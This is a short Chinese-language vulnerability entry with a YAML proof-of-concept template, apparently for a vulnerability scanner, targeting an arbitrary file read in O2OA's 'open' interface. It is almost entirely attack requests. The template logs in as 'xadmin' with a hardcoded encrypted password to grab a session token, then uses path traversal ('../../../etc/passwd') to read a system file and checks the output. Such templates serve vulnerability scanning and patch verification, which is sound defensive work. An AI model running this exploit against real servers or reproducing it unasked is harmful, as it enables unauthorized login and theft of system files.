漏洞描述
O2OA系统 open 接口存在任意文件读取漏洞。攻击者可利用漏洞读取任意文件。 title=="O2OA"
o2oa-open-read-file: O2OA open 后台任意文件读取漏洞
PoC代码[已公开]
id: o2oa-open-read-file
info:
name: O2OA open 后台任意文件读取漏洞
author: zan8in
severity: high
verified: true
description: |
O2OA系统 open 接口存在任意文件读取漏洞。攻击者可利用漏洞读取任意文件。 title=="O2OA"
rules:
r0:
request:
method: POST
path: /x_organization_assemble_authentication/jaxrs/authentication/captcha?v=7.3&lg6aq1g1
headers:
Content-Type: application/json; charset=UTF-8
Cookie: x-token=anonymous
Authorization: anonymous
body: |
{"credential":"xadmin","password":"Kn2Q3eM/KMmNrM287ju4ELXjA63+86QJOQ4mE6ASnn6mdUmp6K4gfarzQxGzl1VwFbskPkk5p34uCEbm4WDa9LYjB7e/GtFpSakHkb3HVc7EmZF9Reap/ci2Ern00lMJIl4/1RFYGNO1MYNJtEAfcG8NVpgG7FaFAm8Dbw+Tb9U=","isEncrypted":"y"}
expression: response.status ==200 && response.body.bcontains(b'"employee":') && response.body.bcontains(b'"success"') && response.body.bcontains(b'"xadmin"')
output:
search: '"\"token\": \"(?P<token>.+)\",".bsubmatch(response.body)'
token: search["token"]
r1:
request:
method: POST
path: /x_program_center/jaxrs/config/open?v=6.3
headers:
Content-Type: application/json; charset=UTF-8
Authorization: "{{token}}"
body: |
{"fileName":"../../../etc/passwd"}
expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0() && r1()